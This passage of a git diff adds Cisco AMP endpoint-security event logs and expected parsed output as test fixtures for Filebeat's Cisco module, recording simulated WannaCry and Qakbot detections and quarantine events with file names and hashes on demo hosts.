Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json new file mode 100644 index 00000000000..3fb89dbd615 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json 
@@ -0,0 +1,5890 @@ +[ + { + "@timestamp": "2021-01-14T21:17:16.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.6A37D750F0-100.SBX.TG", + "cisco.amp.detection_id": "6508397899087347713", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 295927133, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508397899087348000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:38:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 844899579, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14930696955218, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T20:38:26.000Z", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 1313, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" 
+ ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 2612, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + 